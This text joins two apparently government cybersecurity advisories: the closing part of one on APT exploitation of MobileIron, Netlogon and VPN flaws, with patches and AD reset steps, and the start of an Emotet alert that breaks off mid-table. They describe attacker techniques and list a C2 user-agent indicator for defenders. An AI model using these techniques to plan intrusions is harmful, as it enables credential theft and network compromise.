<h3>MobileIron Core &amp; Connector Vulnerability CVE-2020-15505</h3> <p><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a> is a remote code execution vulnerability in MobileIron Core &amp; Connector versions 10.3 and earlier.[<a href="https://www.mobileiron.com/en/blog/mobileiron-security-updates-available">2</a>] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.</p> <h3>Privilege Escalation</h3> <p>Post initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a> in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers (<em>Valid Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078/">T1078</a>]).</p> <h4>Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472</h4> <p><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[<a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">3</a>] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (<em>Valid Accounts: Domain Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078/002/">T1078.002</a>]). Malicious actors can leverage this vulnerability to compromise other devices on the network (<em>Lateral Movement</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0008/">TA0008</a>]).</p> <h3>Persistence</h3> <p>Once system access has been achieved, the APT actors use abuse of legitimate credentials (<em>Valid Accounts </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/">T1078</a>]) to log in via VPN or remote access services <em>(External Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1133/">T1133</a>]) to maintain persistence.</p> <h3>Mitigations</h3><p>Organizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an “assume breach” mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.</p> <h3>Keep Systems Up to Date</h3> <p>Patch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.</p> <p class="text-align-center"><em>Table 1: Patch information for CVEs</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 918.333px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 137px;"><strong>Vulnerability</strong></th> <th scope="col" style="width: 321px;"><strong>Vulnerable Products</strong></th> <th scope="col" style="width: 442px;"><strong>Patch Information</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>FortiOS 6.0: 6.0.0 to 6.0.4</li> <li>FortiOS 5.6: 5.6.3 to 5.6.7</li> <li>FortiOS 5.4: 5.4.6 to 5.4.12</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://www.fortiguard.com/psirt/FG-IR-18-384">Fortinet Security Advisory: FG-IR-18-384</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Citrix Application Delivery Controller</li> <li>Citrix Gateway</li> <li>Citrix SDWAN WANOP</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 &nbsp;</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/">Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://support.f5.com/csp/article/K52145254">F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11510">CVE-2019-11510</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15</li> <li>Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101">Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 &nbsp;</li> <li>Sentry versions 9.7.2 and earlier, and 9.8.0; &nbsp;</li> <li>Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://www.mobileiron.com/en/blog/mobileiron-security-updates-available">MobileIron Blog: MobileIron Security Updates Available</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1631">CVE-2020-1631</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://kb.juniper.net/InfoCenter/index?page=content&amp;id=JSA11021">Juniper Security Advisory JSA11021</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-2021">CVE-2020-2021</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://security.paloaltonetworks.com/CVE-2020-2021">Palo Alto Networks Security Advisory for CVE-2020-2021</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2016</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1903&nbsp; (Server Core installation)</li> <li>Windows Server, version 1909&nbsp; (Server Core installation)</li> <li>Windows Server, version 2004&nbsp;&nbsp; (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">Microsoft Security Advisory for CVE-2020-1472</a></li> </ul> </td> </tr> </tbody> </table> <h3>Comprehensive Account Resets</h3> <p>If there is an observation of <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure-hosted AD instances.</p> <p>Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.</p> <p>It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.</p> <ol> <li>Create a temporary administrator account, and use this account only for all administrative actions</li> <li>Reset the Kerberos Ticket Granting Ticket (<code>krbtgt</code>) password [<a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">4</a>]; this must be completed before any additional actions (a second reset will take place in step 5)</li> <li>Wait for the krbtgt reset to propagate to all domain controllers (time may vary)</li> <li>Reset all account passwords (passwords should be 15 characters or more and randomly assigned): <ol type="a"> <li>User accounts (forced reset with no legacy password reuse)</li> <li>Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])</li> <li>Service accounts</li> <li>Directory Services Restore Mode (DSRM) account</li> <li>Domain Controller machine account</li> <li>Application passwords</li> </ol> </li> <li>Reset the <code>krbtgt</code> password again</li> <li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li> <li>Reboot domain controllers</li> <li>Reboot all endpoints</li> </ol> <p>The following accounts should be reset:</p> <ul> <li>AD Kerberos Authentication Master (2x)</li> <li>All Active Directory Accounts</li> <li>All Active Directory Admin Accounts</li> <li>All Active Directory Service Accounts</li> <li>All Active Directory User Accounts</li> <li>DSRM Account on Domain Controllers</li> <li>Non-AD Privileged Application Accounts</li> <li>Non-AD Unprivileged Application Accounts</li> <li>Non-Windows Privileged Accounts</li> <li>Non-Windows User Accounts</li> <li>Windows Computer Accounts</li> <li>Windows Local Admin</li> </ul> <h3>CVE-2020-1472</h3> <p class="MemoBullet1" style="mso-list:l0 level1 lfo1"><!--[if !supportLists]-->To secure your organization’s Netlogon channel connections:</p> <ul> <li><strong>Update all Domain Controllers and Read Only Domain Controllers</strong>. On August 11, 2020, Microsoft released <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">software updates</a> to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).</li> <li><strong>Monitor for new events, and address non-compliant devices</strong> that are using vulnerable Netlogon secure channel connections.</li> <li><strong>Block public access to potentially vulnerable ports</strong>, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).</li> </ul> <p>To protect your organization against this CVE, follow <a href="https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc">advice from Microsoft</a>, including:</p> <ul> <li>Update your domain controllers with an update released August 11, 2020, or later.</li> <li>Find which devices are making vulnerable connections by monitoring event logs.</li> <li>Address non-compliant devices making vulnerable connections.</li> <li>Enable enforcement mode to address <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a> in your environment.</li> </ul> <h3>VPN Vulnerabilities</h3> <p>Implement the following recommendations to secure your organization’s VPNs:</p> <ul> <li><strong>Update VPNs, network infrastructure devices, and devices </strong>being used to remote into work environments with the latest software patches and security configurations. See CISA Tips <a href="https://us-cert.cisa.gov/ncas/tips/ST04-006">Understanding Patches and Software Updates</a> and <a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">Securing Network Infrastructure Devices</a>. Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.</li> <li><strong>Implement multi-factor authentication (MFA) on all VPN connections to increase security</strong>. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips <a href="https://us-cert.cisa.gov/ncas/tips/ST04-002">Choosing and Protecting Passwords</a> and <a href="https://us-cert.cisa.gov/ncas/tips/ST05-012">Supplementing Passwords</a> for more information.</li> </ul> <p>Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:</p> <ul> <li><strong>Audit </strong>configuration and patch management programs.</li> <li><strong>Monitor</strong> network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).</li> <li><strong>Implement </strong>MFA, especially for privileged accounts.</li> <li><strong>Use </strong>separate administrative accounts on separate administration workstations.</li> <li><strong>Keep </strong><a href="https://us-cert.cisa.gov/ncas/tips/ST04-006">software up to date</a>. Enable automatic updates, if available.&nbsp;</li> </ul> <h3>How to uncover and mitigate malicious activity</h3> <ul> <li><strong>Collect and remove</strong> for further analysis: <ul> <li>Relevant artifacts, logs, and data.</li> </ul> </li> <li><strong>Implement </strong>mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.</li> <li><strong>Consider </strong>soliciting incident response support from a third-party IT security organization to: <ul> <li>Provide subject matter expertise and technical support to the incident response.</li> <li>Ensure that the actor is eradicated from the network.</li> <li>Avoid residual issues that could result in follow-up compromises once the incident is closed.</li> </ul> </li> </ul> <h3>Resources</h3> <ul> <li><a href="https://www.cisa.gov/vpn-related-guidance">CISA VPN-Related Guidance</a></li> <li>CISA Infographic: <a href="https://www.cisa.gov/sites/default/files/publications/Risk and Vulnerability Assessment %28RVA%29 Mapped to the MITRE ATT%26amp%3BCK Framework Infographic_v6-100620_ 508.pdf">Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&amp;CK FRAMEWORK</a></li> <li>National Security Agency InfoSheet: <a href="https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF">Configuring IPsec Virtual Private Networks</a></li> <li>CISA Joint Advisory: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity</a></li> <li>CISA Activity Alert: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-073a">AA20-073A: Enterprise VPN Security</a></li> <li>CISA Activity Alert: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-031a">AA20-031A: Detecting Citrix CVE-2019-19781</a></li> <li>CISA Activity Alert: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-010a">AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability</a></li> <li><strong>Cybersecurity Alerts and Advisories</strong>: Subscriptions to <a href="https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new">CISA Alerts</a> and <a href="https://learn.cisecurity.org/ms-isac-subscription">MS-ISAC Advisories</a></li> </ul> <h3>Contact Information</h3><p>Recipients of this report are encouraged to contribute any additional information that they may have related to this threat.</p> <p>For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:</p> <ul> <li>CISA (888-282-0870 or <a href="https://us-cert.cisa.govmailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>), or</li> <li>The FBI through the FBI Cyber Division (855-292-3937 or <a href="https://us-cert.cisa.govmailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>) or a <a href="https://www.fbi.gov/contact-us/field-offices/field-offices">local field office</a></li> </ul> <div class="special_container text-align-center">&nbsp;</div> <div class="special_container text-align-center"><strong><em>DISCLAIMER</em></strong></div> <div class="special_container">&nbsp;</div> <div class="special_container"> <p><em>This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p> <p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p> </div> <p>&nbsp;</p> <p><o:p></o:p></p> <h3>References</h3> <ul> <li><a href="https://www.fortiguard.com/psirt/FG-IR-18-384">[1] Fortinet Advisory: FG-IR-18-384 </a></li> <li><a href="https://www.mobileiron.com/en/blog/mobileiron-security-updates-available">[2] MobileIron Blog: MobileIron Security Updates Available</a></li> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">[3] Microsoft Security Advisory for CVE-2020-1472</a></li> <li><a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 9, 2020: Initial Version</li> <li>October 11, 2020: Updated Summary</li> <li>October 12, 2020: Added Additional Links</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-280A: Emotet Malware
Original release date: October 6, 2020 | Last revised: October 24, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p>This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing &amp; Analysis Center (MS-ISAC).</p> <p>Emotet—a sophisticated Trojan commonly functioning as a downloader or dropper of other malware—resurged in July 2020, after a dormant period that began in February. Since August, CISA and MS-ISAC have seen a significant increase in malicious cyber actors targeting state and local governments with Emotet phishing emails. This increase has rendered Emotet one of the most prevalent ongoing threats.</p> <p>To secure against Emotet, CISA and MS-ISAC recommend implementing the mitigation measures described in this Alert, which include applying protocols that block suspicious attachments, using antivirus software, and blocking suspicious IPs.</p> <h3>Technical Details</h3><p>Emotet is an advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch the payload (<em>Phishing: Spearphishing Attachment</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001/">T1566.001</a>], <em>Phishing: Spearphishing Link</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002/">T1566.002</a>]).The malware then attempts to proliferate within a network by brute forcing user credentials and writing to shared drives (<em>Brute Force: Password Guessing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110/001/">T1110.001</a>], <em>Valid Accounts: Local Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078/003/">T1078.003</a>], <em>Remote Services: SMB/Windows Admin Shares</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1021/002/">T1021.002</a>]).</p> <p>Emotet is difficult to combat because of its “worm-like” features that enable network-wide infections. Additionally, Emotet uses modular Dynamic Link Libraries to continuously evolve and update its capabilities.</p> <p>Since July 2020, CISA has seen increased activity involving Emotet-associated indicators. During that time, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected roughly 16,000 alerts related to Emotet activity. CISA observed Emotet being executed in phases during possible targeted campaigns. Emotet used compromised Word documents (.doc) attached to phishing emails as initial insertion vectors. Possible command and control network traffic involved <code>HTTP POST</code> requests to Uniform Resource Identifiers consisting of nonsensical random length alphabetical directories to known Emotet-related domains or IPs with the following user agent string (<em>Application Layer Protocol: Web Protocols</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/001/">T1071.001</a>]).</p> <p><code>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR</code></p> <p>Traffic to known Emotet-related domains or IPs occurred most commonly over ports 80, 8080, and 443. In one instance, traffic from an Emotet-related IP attempted to connect to a suspected compromised site over port 445, possibly indicating the use of Server Message Block exploitation frameworks along with Emotet (<em>Exploitation of Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1210/">T1210</a>]). Figure 1 lays out Emotet’s use of enterprise techniques.</p> <p>&nbsp;</p> <p data-entity-type="" data-entity-uuid="" style="text-align: center;"><span><img alt="" data-entity-type="" data-entity-uuid="" height="526" src="https://us-cert.cisa.gov/sites/default/files/publications/Figure%201_0.png" width="679" /><span title="Click and drag to resize">​</span></span></p> <p class="text-align-center"><em>Figure 1: MITRE ATT&amp;CK enterprise techniques used by Emotet</em></p> <h4>&nbsp;</h4> <h4>Timeline of Activity</h4> <p>The following timeline identifies key Emotet activity observed in 2020.</p> <ul> <li><strong>February</strong>: Cybercriminals targeted non-U.S. countries using COVID-19-themed phishing emails to lure victims to download Emotet.[<a href="https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/">1</a>]</li> </ul> <ul> <li><strong>July</strong>: Researchers spotted emails with previously used Emotet URLs, particularly those used in the February campaign, targeting U.S. businesses with COVID-19-themed lures.[<a href="https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/">2</a>]</li> </ul> <ul> <li><strong>August</strong>: <ul> <li>Security researchers observed a 1,000 percent increase in downloads of the Emotet loader. Following this change, antivirus software firms adjusted their detection heuristics to compensate, leading to decreases in observed loader downloads.[<a href="https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/">3</a>] &nbsp;</li> <li>Proofpoint researchers noted mostly minimal changes in most tactics and tools previously used with Emotet. Significant changes included: <ul> <li>Emotet delivering Qbot affiliate <code>partner01</code> as the primary payload and</li> <li>The Emotet mail sending module’s ability to deliver benign and malicious attachments.[<a href="https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return">4</a>]</li> </ul> </li> <li>CISA and MS-ISAC observed increased attacks in the United States, particularly cyber actors using Emotet to target state and local governments.</li> </ul> </li> </ul> <ul> <li><strong>September</strong>: <ul> <li>Cyber agencies and researchers alerted the public of surges of Emotet, including compromises in Canada, France, Japan, New Zealand, Italy, and the Netherlands. Emotet botnets were observed dropping Trickbot to deliver ransomware payloads against some victims and Qakbot Trojans to steal banking credentials and data from other targets.[<a href="https://www.zdnet.com/article/france-japan-new-zealand-warn-of-sudden-spike-in-emotet-attacks/">5</a>],[<a href="https://www.bleepingcomputer.com/news/security/france-warns-of-emotet-attacking-companies-administration/">6</a>],[<a href="https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/">7</a>],[<a href="https://www.zdnet.com/article/microsoft-italy-and-the-netherlands-warn-of-increased-emotet-activity/">8</a>]</li> <li>Security researchers from Microsoft identified a pivot in tactics from the Emotet campaign. The new tactics include attaching password-protected archive files (e.g., Zip files) to emails to bypass email security gateways. These email messages purport to deliver documents created on mobile devices to lure targeted users into enabling macros to “view” the documents—an action which actually enables the delivery of malware.[<a href="https://www.bleepingcomputer.com/news/security/emotet-double-blunder-fake-windows-10-mobile-and-outdated-messages/">9</a>]</li> <li>Palo Alto Networks reported cyber actors using thread hijacking to spread Emotet. This attack technique involves stealing an existing email chain from an infected host to reply to the chain—using a spoofed identity—and attaching a malicious document to trick recipients into opening the file.[<a href="https://unit42.paloaltonetworks.com/emotet-thread-hijacking/">10</a>]</li> </ul> </li> </ul> <h3>MITRE ATT&amp;CK Techniques</h3> <p>According to MITRE, <a href="https://attack.mitre.org/versions/v7/software/S0367/">Emotet</a> uses the ATT&amp;CK techniques listed in table 1.</p> <p class="italic text-align-center"><em>Table 1: Common exploit tools</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="632" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 448px;"> <p>Technique</p> </th> <th scope="col" style="width: 492px;">Use</th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>OS Credential Dumping: LSASS Memory</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/001/">T1003.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed dropping password grabber modules including Mimikatz.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Remote Services: SMB/Windows Admin Shares</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1021/002/">T1021.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Obfuscated Files or Information </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/">T1027</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, <code>cmd.exe</code> arguments, and PowerShell scripts.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Obfuscated Files or Information: Software Packing </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/002/">T1027.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used custom packers to protect its payloads.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Network Sniffing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1040/">T1040</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed to hook network APIs to monitor network traffic.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Exfiltration Over C2 Channel </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1041/">T1041</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been seen exfiltrating system information stored within cookies sent within a <code>HTTP GET</code> request back to its command and control (C2) servers.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Windows Management Instrumentation</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1047/">T1047</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used WMI to execute <code>powershell.exe</code>.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Process Injection: Dynamic-link Library Injection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/001/">T1055.001</a>]</p> </td> <td> <p>Emotet has been observed injecting in to <code>Explorer.exe</code> and other processes.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Process Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1057/">T1057</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed enumerating local processes.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Command and Scripting Interpreter: PowerShell</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/001/">T1059.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Command and Scripting Interpreter: Windows Command Shell </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/003/">T1059.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used <code>cmd.exe</code> to run a PowerShell script.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Command and Scripting Interpreter: Visual Basic</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/005/">T1059.005</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Valid Accounts: Local Accounts </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/003/">T1078.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet can brute force a local admin password, then use it to facilitate lateral movement.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; 